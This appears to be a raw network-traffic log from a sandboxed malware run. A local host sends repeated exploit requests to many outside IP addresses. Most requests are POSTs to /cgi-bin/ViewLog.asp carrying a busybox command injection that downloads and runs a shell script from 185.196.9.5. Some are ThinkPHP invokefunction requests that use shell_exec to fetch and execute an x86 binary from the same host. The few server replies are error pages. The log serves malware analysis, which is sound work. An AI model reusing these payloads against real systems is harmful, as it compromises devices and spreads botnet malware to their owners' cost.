Feb 25, 2024 19:04:50.965120077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:51.557099104 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:52.709163904 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:55.013118029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.620999098 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:08.836977959 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:27.524823904 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
984	192.168.2.15	45728	31.136.243.137	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.965176105 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:51.557096958 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:52.709150076 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:55.013103008 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.621005058 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:08.836961985 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:27.524707079 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
985	192.168.2.15	33514	88.221.244.239	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:51.405925989 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:51.731275082 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:51 GMT Date: Sun, 25 Feb 2024 18:04:51 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 66 39 62 32 35 63 34 26 23 34 36 3b 31 37 30 38 38 38 34 32 39 31 26 23 34 36 3b 32 37 63 63 62 34 37 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.8f9b25c4.1708884291.27ccb476</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
986	192.168.2.15	33768	88.5.141.0	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:51.610541105 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:51.813591957 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 25 Feb 2024 18:04:51 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
987	192.168.2.15	57582	88.216.161.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:51.946265936 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:52.156387091 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
988	192.168.2.15	57586	88.216.161.112	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:52.378555059 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
989	192.168.2.15	41444	94.121.158.202	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:53.018347979 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
990	192.168.2.15	41860	85.122.215.85	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:53.187016964 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
991	192.168.2.15	43514	94.120.13.83	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:53.242501020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
992	192.168.2.15	40850	94.122.5.147	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:53.242623091 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
993	192.168.2.15	42976	95.209.129.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:53.293034077 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:54.064574957 CET	549	IN	HTTP/1.1 404 Not Found Server: thttpd Content-Type: text/html; charset=iso-8859-1 Date: Sun, 25 Feb 2024 18:04:54 GMT Last-Modified: Sun, 25 Feb 2024 18:04:54 GMT Accept-Ranges: bytes Connection: close Cache-Control: no-cache,no-store Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 6c 6f 63 61 6c 68 6f 73 74 22 3e 74 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/cgi-bin/ViewLog.asp' was not found on this server.<HR><ADDRESS><A HREF="http://localhost">thttpd</A></ADDRESS></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
994	192.168.2.15	44378	95.111.241.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:53.442337990 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:54.725199938 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
995	192.168.2.15	46776	31.136.31.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:54.221839905 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:54.789160013 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:55.941251040 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:58.341021061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:02.948976994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:12.168870926 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.620779991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
996	192.168.2.15	55386	94.154.87.204	8080

Timestamp	Bytes transferred	Direction	Data
